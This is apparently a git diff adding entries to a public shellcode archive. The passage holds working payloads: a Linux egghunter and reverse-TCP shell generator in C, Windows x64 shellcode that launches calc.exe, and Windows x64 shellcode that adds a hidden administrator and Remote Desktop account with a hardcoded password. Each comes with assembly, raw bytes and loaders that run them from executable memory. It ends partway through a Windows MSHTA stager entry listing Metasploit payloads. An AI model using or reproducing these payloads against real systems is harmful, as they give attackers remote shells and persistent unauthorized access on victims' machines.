+//"\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (original version by skape) - 35 bytes
+//"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"; // access method - 39 bytes
+*/
+
+/* Reverse TCP Shell:
+egg \x90\x50\x90\x50\x90\x50\x90\x50
+127.1.1.1 4444 */
+unsigned char shellcode[] = \
+"\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\x31\xc0\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf0\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"; //IP address at eggsize + 26th byte; Port at eggsize + 32nd byte
+
+int eggsize = 4; //default
+
+main(int argc, char *argv[])
+{
+
+ if (argc < 2)
+ {
+ printf("Usage: %s [egg] [IP] [Port]", argv[0]);
+ printf("\nExample: %s 0 0x9050 127.1.1 4444\n"
+ "%s 1 AABB 127.1.1.1 4444\n"
+ "%s 2 AABBCCDD 127.1.1.1 4444\n"
+ "%s 2 3d7xC0D3 127.1.1.1 4444\n", argv[0], argv[0], argv[0], argv[0]);
+ printf("\n\nDefault egg: \\x90\\x50\\x90\\x50 (push eax, nop, push eax, nop)"
+ "\nDefault shellcode IP and port 127.1.1.1:4444");
+ printf("\n\nAvailable egghunters:"
+ "\n0 - access method (39 bytes), requires executable egg"
+ "\n1 - access revisited (37 bytes)"
+ "\n2 - sigaction (32 bytes)\n"
+ );
+
+ return 0;
+ }
+
+ int eh = atoi((char *)argv[1]);
+ if (eh < 0 || eh > 2)
+ {
+ printf("Invalid Egghunter: %d!\n", eh);
+
+ return 0;
+ }
+
+ if (argc > 2)
+ {
+ if (argv[2][0] == '0' && argv[2][1] == 'x') argv[2] += 2;
+
+ if (strlen(argv[2]) != 4 && strlen(argv[2]) != 8)
+ {
+ printf("Egg has to be at least 4 or exactly 8 bytes!"
+ "\nExample eggs: 9050, 9060, C0D3,"
+ "\n d7xC0D3D, 3d7xC0D3, 3d7xC0D3, 7d7xC0D3"
+ "\n"
+ );
+
+ return 0;
+ }
+
+ int i;
+ for (i = 0; i < strlen(argv[2]); i+=2)
+ if (argv[2][i] == '0' && argv[2][i+1] == '0')
+ {
+ printf("No null bytes!\n");
+ return 0;
+ }
+
+ }
+
+ /* change egg if provided */
+ int eh_offset = 1; // default offset for access method (39 bytes)
+ if (eh == 1) eh_offset = 23; // offset for access revisited (37 bytes)
+ else if (eh ==2) eh_offset = 18; // offset for sigaction (32 bytes)
+
+ if (argc > 2) {
+
+ unsigned char* new_egg = argv[2], *s, *tmp;
+ printf("Changing egg to %s...\n", new_egg);
+
+ s = ConvertStrToHex(argv[2]);
+ tmp = s;
+
+
+ //fill buffer - 4 bytes of [egg], then concatenate additional 4 bytes of [egg] (8 bytes)
+ strcat(tmp, s);
+ if (strlen(argv[2]) == 4)
+ strcat(tmp, tmp);
+
+ //PrintShellcode(s);
+ change_shellcode_bytes(egghunter[eh], eh_offset, eh_offset+3, s);
+ change_shellcode_bytes(shellcode, 0, 7, tmp);
+ }
+
+ printf("Egghunter %d, size %d\n", eh, strlen(egghunter[eh] ) );
+ printf("Egghunter shellcode: \n");
+ PrintShellcode(egghunter[eh]);
+
+ printf("\nReverse TCP Shellcode (%d bytes): \n", strlen(shellcode));
+
+ // change shellcode IP address
+ unsigned char *s2 = shellcode;
+ if (argc > 3)
+ {
+ printf("%s\n", argv[3]);
+
+ // convert IP address to binary representation and store in ipaddr.sin_addr.s_addr
+ struct sockaddr_in ipaddr;
+ inet_aton(argv[3], &ipaddr.sin_addr.s_addr);
+
+
+ int i = eggsize*2+26, a;
+ int e = i+3;
+
+ for (i, a = 0; i <= e; i++, a+=8)
+ {
+ s2[i] = (ipaddr.sin_addr.s_addr >> a) & 0xff ;
+ printf("Byte %d: %.02x\n", i, s2[i]);
+ }
+
+ }
+
+ // change shellcode Port
+ int port = 4444; //0x115c - default
+
+ if (argc > 4)
+ {
+ port = atoi(argv[4]);
+ unsigned int p1 = (port >> 8) & 0xff;
+ unsigned int p2 = port & 0xff;
+ s2[eggsize*2+32] = (unsigned char){p1};
+ s2[eggsize*2+33] = (unsigned char){p2};
+ }
+
+ printf("Port %d\n", port);
+ PrintShellcode(s2);
+
+ printf("\n");
+ int (*ret)() = (int(*)())egghunter[eh];
+
+ ret();
+
+}
+
+void change_shellcode_bytes(unsigned char* shellcode_n, int offset, int n, unsigned char* new)
+{
+ int i, a;
+ for (i = offset, a = 0; i <= n; i++, a++)
+ shellcode_n[i] = (unsigned char) {new[a]};
+ // printf("Byte %d: %.02x\n", i, shellcode_n[i]);
+}
+
+void PrintShellcode(unsigned char* s)
+{
+ printf("\"");
+ while (*s)
+ printf("\\x%.02x", (unsigned int) *s++);
+
+ printf("\"\n");
+}
+
+unsigned char* ConvertStrToHex(unsigned char* s)
+{
+ if (s[0] == '0' && s[1] == 'x') s += 2;
+ unsigned char buf[strlen(s)/2];
+ buf[strlen(s)/2] = '\0';
+
+ int len = sizeof(buf);
+ size_t count;
+
+ for (count = 0; count < len; count++) {
+ sscanf(s, "%2hhx", &buf[count]);
+ s += 2;
+ }
+
+ return buf;
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86-64/49819.c b/shellcodes/windows_x86-64/49819.c
new file mode 100644
index 000000000..7ed84bbbf
--- /dev/null
+++ b/shellcodes/windows_x86-64/49819.c
@@ -0,0 +1,133 @@
+# Shellcode Title: Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)
+# Shellcode Author: Bobby Cooke (boku)
+# Date: 02/05/2021
+# Tested on: Windows 10 v2004 (x64)
+# Shellcode Description:
+# 64bit Windows 10 shellcode that dynamically resolves the base address of kernel32.dll via PEB & ExportTable method.
+# Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities.
+# Grew tired of Windows Defender alerts from MSF code when developing, so built this as a template for development of advanced payloads.
+
+; Compile & get shellcode from Kali:
+; nasm -f win64 popcalc.asm -o popcalc.o
+; for i in $(objdump -D popcalc.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
+; Get kernel32.dll base address
+xor rdi, rdi ; RDI = 0x0
+mul rdi ; RAX&RDX =0x0
+mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
+mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
+mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
+mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
+mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
+mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
+mov r8, rbx ; RBX & R8 = &kernel32.dll
+
+; Get kernel32.dll ExportTable Address
+mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
+add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
+xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
+add cx, 0x88ff
+shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
+mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
+add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
+
+; Get &AddressTable from Kernel32.dll ExportTable
+xor r10, r10
+mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
+add r10, r8 ; R10 = &AddressTable
+
+; Get &NamePointerTable from Kernel32.dll ExportTable
+xor r11, r11
+mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
+add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
+
+; Get &OrdinalTable from Kernel32.dll ExportTable
+xor r12, r12
+mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
+add r12, r8 ; R12 = &OrdinalTable
+
+jmp short apis
+
+; Get the address of the API from the Kernel32.dll ExportTable
+getapiaddr:
+pop rbx ; save the return address for ret 2 caller after API address is found
+pop rcx ; Get the string length counter from stack
+xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
+mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
+push rcx ; push the string length counter to stack
+loop:
+mov rcx, [rsp] ; reset the string length counter from the stack
+xor rdi,rdi ; Clear RDI for setting up string name retrieval
+mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
+add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
+mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
+repe cmpsb ; Compare strings at RDI & RSI
+je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
+incloop:
+inc rax
+jmp short loop
+
+; Find the address of GetProcAddress by using the last value of the Counter
+resolveaddr:
+pop rcx ; remove string length counter from top of stack
+mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.
+mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
+add rax, r8 ; RAX = Kernel32. = RVA kernel32. + kernel32.dll BaseAddress
+push rbx ; place the return address from the api string call back on the top of the stack
+ret ; return to API caller
+
+apis: ; API Names to resolve addresses
+; WinExec | String length : 7
+xor rcx, rcx
+add cl, 0x7 ; String length for compare string
+mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec
+not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
+shr rax, 0x8 ; xEcoll,0xFFFF --> 0x0000,xEcoll
+push rax
+push rcx ; push the string length counter to stack
+call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable
+mov r14, rax ; R14 = Kernel32.WinExec Address
+
+; UINT WinExec(
+; LPCSTR lpCmdLine, => RCX = "calc.exe",0x0
+; UINT uCmdShow => RDX = 0x1 = SW_SHOWNORMAL
+; );
+xor rcx, rcx
+mul rcx ; RAX & RDX & RCX = 0x0
+; calc.exe | String length : 8
+push rax ; Null terminate string on stack
+mov rax, 0x9A879AD19C939E9C ; not 0x9A879AD19C939E9C = "calc.exe"
+not rax
+;mov rax, 0x6578652e636c6163 ; exe.clac : 6578652e636c6163
+push rax ; RSP = "calc.exe",0x0
+mov rcx, rsp ; RCX = "calc.exe",0x0
+inc rdx ; RDX = 0x1 = SW_SHOWNORMAL
+sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
+call r14 ; Call WinExec("calc.exe", SW_HIDE)
+
+
+###########################################################################################################################################
+
+// runShellcode.c
+// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net)
+#include
+void main() {
+ void* exec;
+ BOOL rv;
+ HANDLE th;
+ DWORD oldprotect = 0;
+ // Shellcode
+ unsigned char payload[] =
+ "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
+ "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
+ "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
+ "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
+ "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
+ "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
+ "\x48\x83\xec\x20\x41\xff\xd6";
+ unsigned int payload_len = 205;
+ exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ RtlMoveMemory(exec, payload, payload_len);
+ rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);
+ th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
+ WaitForSingleObject(th, -1);
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86-64/49820.c b/shellcodes/windows_x86-64/49820.c
new file mode 100644
index 000000000..a9d7416f0
--- /dev/null
+++ b/shellcodes/windows_x86-64/49820.c
@@ -0,0 +1,193 @@
+# Shellcode Title: Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)
+# Shellcode Author: Bobby Cooke (boku)
+# Date: 02/05/2021
+# Tested on: Windows 10 v2004 (x64)
+# Compiled from: Kali Linux (x86_64)
+# Full Disclosure: github.com/boku7/x64win-AddRdpAdminShellcode
+# Shellcode Description:
+# 64bit Windows 10 shellcode that adds user BOKU:SP3C1ALM0V3 to the system and the localgroups
+# Administrators & "Remote Desktop Users". Position Independent Code (PIC) that dynamically resolves
+# KERNEL32 DLL via PEB & LDR. Shellcode contains no null bytes, and therefor can be used on typical
+# stack based Buffer OverFlow vulnerabilities. Shellcode must be executed from a process with either
+# a HIGH or SYSTEM integrity level.
+
+; nasm -f win64 addRdpAdmin.asm -o addRdpAdmin.o
+; for i in $(objdump -D addRdpAdmin.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
+; Get kernel32.dll base address
+xor rdi, rdi ; RDI = 0x0
+mul rdi ; RAX&RDX =0x0
+mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
+mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
+mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
+mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
+mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
+mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
+mov r8, rbx ; RBX & R8 = &kernel32.dll
+
+; Get kernel32.dll ExportTable Address
+mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
+add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
+xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
+add cx, 0x88ff
+shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
+mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
+add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
+
+; Get &AddressTable from Kernel32.dll ExportTable
+xor r10, r10
+mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
+add r10, r8 ; R10 = &AddressTable
+
+; Get &NamePointerTable from Kernel32.dll ExportTable
+xor r11, r11
+mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
+add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
+
+; Get &OrdinalTable from Kernel32.dll ExportTable
+xor r12, r12
+mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
+add r12, r8 ; R12 = &OrdinalTable
+
+jmp short apis
+
+; Get the address of the API from the Kernel32.dll ExportTable
+getapiaddr:
+pop rbx ; save the return address for ret 2 caller after API address is found
+pop rcx ; Get the string length counter from stack
+xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
+mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
+push rcx ; push the string length counter to stack
+loop:
+mov rcx, [rsp] ; reset the string length counter from the stack
+xor rdi,rdi ; Clear RDI for setting up string name retrieval
+mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
+add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
+mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
+repe cmpsb ; Compare strings at RDI & RSI
+je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
+incloop:
+inc rax
+jmp short loop
+
+; Find the address of GetProcAddress by using the last value of the Counter
+resolveaddr:
+pop rcx ; remove string length counter from top of stack
+mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.
+mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
+add rax, r8 ; RAX = Kernel32. = RVA kernel32. + kernel32.dll BaseAddress
+push rbx ; place the return address from the api string call back on the top of the stack
+ret ; return to API caller
+
+apis: ; API Names to resolve addresses
+; WinExec | String length : 7
+xor rcx, rcx
+add cl, 0x7 ; String length for compare string
+mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec
+not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
+shr rax, 0x8 ; cexEniW,0xF0 --> 0x00,cexEniW
+push rax
+push rcx ; push the string length counter to stack
+call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable
+mov r14, rax ; R14 = Kernel32.WinExec Address
+
+jmp short command
+
+WinExec:
+; UINT WinExec(
+; LPCSTR lpCmdLine, => RCX = + 0x00 (Null Terminated)
+; UINT uCmdShow => RDX = 0x0 = SW_HIDE
+; );
+xor rdx, rdx ; RDX = 0x0 = SW_HIDE
+sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
+call r14 ; Call WinExec(, SW_HIDE)
+add rsp, 0x20 ; Fix stack
+ret
+
+command:
+; WinExec("cmd.exe /c net user BOKU SP3C1ALM0V3 /add && net localgroup Administrators BOKU /add && net localgroup \"Remote Desktop Users\" BOKU /add", 0x0);
+; 63 6D 64 2E 65 78 65 20 2F 63 20 6E 65 74 20 75 cmd.exe /c net u
+; 73 65 72 20 42 4F 4B 55 20 53 50 33 43 31 41 4C ser BOKU SP3C1AL
+; 4D 30 56 33 20 2F 61 64 64 20 26 26 20 6E 65 74 M0V3 /add && net
+; 20 6C 6F 63 61 6C 67 72 6F 75 70 20 41 64 6D 69 localgroup Admi
+; 6E 69 73 74 72 61 74 6F 72 73 20 42 4F 4B 55 20 nistrators BOKU
+; 2F 61 64 64 20 26 26 20 6E 65 74 20 6C 6F 63 61 /add && net loca
+; 6C 67 72 6F 75 70 20 22 52 65 6D 6F 74 65 20 44 lgroup "Remote D
+; 65 73 6B 74 6F 70 20 55 73 65 72 73 22 20 42 4F esktop Users" BO
+; 4B 55 20 2F 61 64 64 00 KU /add.
+; String length : 135
+mov rax, 0x6464612f20554bFF ; dda/ UK : 6464612f20554b
+shr rax, 0x8
+push rax
+mov rax, 0x4f42202273726573 ; OB "sres : 4f42202273726573
+push rax
+mov rax, 0x5520706f746b7365 ; U potkse : 5520706f746b7365
+push rax
+mov rax, 0x442065746f6d6552 ; D etomeR : 442065746f6d6552
+push rax
+mov rax, 0x222070756f72676c ; " puorgl : 222070756f72676c
+push rax
+mov rax, 0x61636f6c2074656e ; acol ten : 61636f6c2074656e
+push rax
+mov rax, 0x202626206464612f ; && dda/ : 202626206464612f
+push rax
+mov rax, 0x20554b4f42207372 ; UKOB sr : 20554b4f42207372
+push rax
+mov rax, 0x6f7461727473696e ; otartsin : 6f7461727473696e
+push rax
+mov rax, 0x696d64412070756f ; imdA puo : 696d64412070756f
+push rax
+mov rax, 0x72676c61636f6c20 ; rglacol : 72676c61636f6c20
+push rax
+mov rax, 0x74656e2026262064 ; ten && d : 74656e2026262064
+push rax
+mov rax, 0x64612f203356304d ; da/ 3V0M : 64612f203356304d
+push rax
+mov rax, 0x4c41314333505320 ; LA1C3PS : 4c41314333505320
+push rax
+mov rax, 0x554b4f4220726573 ; UKOB res : 554b4f4220726573
+push rax
+mov rax, 0x752074656e20632f ; u ten c/ : 752074656e20632f
+push rax
+mov rax, 0x206578652e646d63 ; exe.dmc : 206578652e646d63
+push rax
+mov rcx, rsp ; RCX = ,0x0
+call WinExec
+
+###########################################################################################################################################
+
+#include
+// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net)
+int main(void) {
+ void* exec_mem;
+ BOOL rv;
+ HANDLE th;
+ DWORD oldprotect = 0;
+
+ unsigned char payload[] =
+ "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49"
+ "\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44"
+ "\x8b\x52\x1c\x4d\x01\xc2\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59"
+ "\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff"
+ "\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91"
+ "\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0\xff\xff\xff\x49\x89\xc6\xeb\x0f\x48\x31\xd2\x48\x83\xec\x20"
+ "\x41\xff\xd6\x48\x83\xc4\x20\xc3\x48\xb8\xff\x4b\x55\x20\x2f\x61\x64\x64\x48\xc1\xe8\x08\x50\x48\xb8\x73\x65\x72\x73\x22"
+ "\x20\x42\x4f\x50\x48\xb8\x65\x73\x6b\x74\x6f\x70\x20\x55\x50\x48\xb8\x52\x65\x6d\x6f\x74\x65\x20\x44\x50\x48\xb8\x6c\x67"
+ "\x72\x6f\x75\x70\x20\x22\x50\x48\xb8\x6e\x65\x74\x20\x6c\x6f\x63\x61\x50\x48\xb8\x2f\x61\x64\x64\x20\x26\x26\x20\x50\x48"
+ "\xb8\x72\x73\x20\x42\x4f\x4b\x55\x20\x50\x48\xb8\x6e\x69\x73\x74\x72\x61\x74\x6f\x50\x48\xb8\x6f\x75\x70\x20\x41\x64\x6d"
+ "\x69\x50\x48\xb8\x20\x6c\x6f\x63\x61\x6c\x67\x72\x50\x48\xb8\x64\x20\x26\x26\x20\x6e\x65\x74\x50\x48\xb8\x4d\x30\x56\x33"
+ "\x20\x2f\x61\x64\x50\x48\xb8\x20\x53\x50\x33\x43\x31\x41\x4c\x50\x48\xb8\x73\x65\x72\x20\x42\x4f\x4b\x55\x50\x48\xb8\x2f"
+ "\x63\x20\x6e\x65\x74\x20\x75\x50\x48\xb8\x63\x6d\x64\x2e\x65\x78\x65\x20\x50\x48\x89\xe1\xe8\x2a\xff\xff\xff";
+ unsigned int payload_len = 387;
+
+ exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ // Copy payload to new buffer
+ RtlMoveMemory(exec_mem, payload, payload_len);
+ // Make new buffer as executable
+ rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
+ // If all good, run the payload
+ if (rv != 0) {
+ th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
+ WaitForSingleObject(th, -1);
+ }
+ return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/49466.asm b/shellcodes/windows_x86/49466.asm
new file mode 100644
index 000000000..960771542
--- /dev/null
+++ b/shellcodes/windows_x86/49466.asm
@@ -0,0 +1,185 @@
+# Exploit Title: Windows/x86 - Stager Generic MSHTA Shellcode (143 bytes)
+# Exploit Author: Armando Huesca Prida
+# Date: 11-01-2021
+# Tested on: Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
+# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
+# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
+
+## Description: Windows x86 Shellcode that uses mshta.exe binary to execute a second stage payload delivered through metasploit's hta_server exploit. This shellcode uses JMP/CALL/POP technic and static kernel32.dll functions addresses.
+
+## Metasploit compatible payload list:
+
+# generic/custom
+# generic/debug_trap
+# generic/shell_bind_tcp
+# generic/shell_reverse_tcp
+# generic/tight_loop
+# windows/dllinject/bind_hidden_ipknock_tcp
+# windows/dllinject/bind_hidden_tcp
+# windows/dllinject/bind_ipv6_tcp
+# windows/dllinject/bind_ipv6_tcp_uuid
+# windows/dllinject/bind_named_pipe
+# windows/dllinject/bind_nonx_tcp
+# windows/dllinject/bind_tcp
+# windows/dllinject/bind_tcp_rc4
+# windows/dllinject/bind_tcp_uuid
+# windows/dllinject/reverse_hop_http
+# windows/dllinject/reverse_http
+# windows/dllinject/reverse_http_proxy_pstore
+# windows/dllinject/reverse_ipv6_tcp
+# windows/dllinject/reverse_nonx_tcp
+# windows/dllinject/reverse_ord_tcp
+# windows/dllinject/reverse_tcp
+# windows/dllinject/reverse_tcp_allports
+# windows/dllinject/reverse_tcp_dns
+# windows/dllinject/reverse_tcp_rc4
+# windows/dllinject/reverse_tcp_rc4_dns
+# windows/dllinject/reverse_tcp_uuid
+# windows/dllinject/reverse_winhttp
+# windows/dns_txt_query_exec
+# windows/download_exec
+# windows/exec
+# windows/loadlibrary
+# windows/messagebox
+# windows/meterpreter/bind_hidden_ipknock_tcp
+# windows/meterpreter/bind_hidden_tcp
+# windows/meterpreter/bind_ipv6_tcp
+# windows/meterpreter/bind_ipv6_tcp_uuid
+# windows/meterpreter/bind_named_pipe
+# windows/meterpreter/bind_nonx_tcp
+# windows/meterpreter/bind_tcp
+# windows/meterpreter/bind_tcp_rc4
+# windows/meterpreter/bind_tcp_uuid
+# windows/meterpreter/reverse_hop_http
+# windows/meterpreter/reverse_http
+# windows/meterpreter/reverse_http_proxy_pstore
+# windows/meterpreter/reverse_https
+# windows/meterpreter/reverse_https_proxy
+# windows/meterpreter/reverse_ipv6_tcp
+# windows/meterpreter/reverse_named_pipe
+# windows/meterpreter/reverse_nonx_tcp
+# windows/meterpreter/reverse_ord_tcp
+# windows/meterpreter/reverse_tcp
+# windows/meterpreter/reverse_tcp_allports
+# windows/meterpreter/reverse_tcp_dns
+# windows/meterpreter/reverse_tcp_rc4
+# windows/meterpreter/reverse_tcp_rc4_dns
+# windows/meterpreter/reverse_tcp_uuid
+# windows/meterpreter/reverse_winhttp
+# windows/meterpreter/reverse_winhttps
+# windows/metsvc_bind_tcp
+# windows/metsvc_reverse_tcp
+# windows/patchupdllinject/bind_hidden_ipknock_tcp
+# windows/patchupdllinject/bind_hidden_tcp
+# windows/patchupdllinject/bind_ipv6_tcp
+# windows/patchupdllinject/bind_ipv6_tcp_uuid
+# windows/patchupdllinject/bind_named_pipe
+# windows/patchupdllinject/bind_nonx_tcp
+# windows/patchupdllinject/bind_tcp
+# windows/patchupdllinject/bind_tcp_rc4
+# windows/patchupdllinject/bind_tcp_uuid
+# windows/patchupdllinject/reverse_ipv6_tcp
+# windows/patchupdllinject/reverse_nonx_tcp
+# windows/patchupdllinject/reverse_ord_tcp
+# windows/patchupdllinject/reverse_tcp
+# windows/patchupdllinject/reverse_tcp_allports
+# windows/patchupdllinject/reverse_tcp_dns
+# windows/patchupdllinject/reverse_tcp_rc4
+# windows/patchupdllinject/reverse_tcp_rc4_dns
+# windows/patchupdllinject/reverse_tcp_uuid
+# windows/patchupmeterpreter/bind_hidden_ipknock_tcp
+# windows/patchupmeterpreter/bind_hidden_tcp
+# windows/patchupmeterpreter/bind_ipv6_tcp
+# windows/patchupmeterpreter/bind_ipv6_tcp_uuid
+# windows/patchupmeterpreter/bind_named_pipe
+# windows/patchupmeterpreter/bind_nonx_tcp
+# windows/patchupmeterpreter/bind_tcp
+# windows/patchupmeterpreter/bind_tcp_rc4
+# windows/patchupmeterpreter/bind_tcp_uuid
+# windows/patchupmeterpreter/reverse_ipv6_tcp
+# windows/patchupmeterpreter/reverse_nonx_tcp
+# windows/patchupmeterpreter/reverse_ord_tcp
+# windows/patchupmeterpreter/reverse_tcp
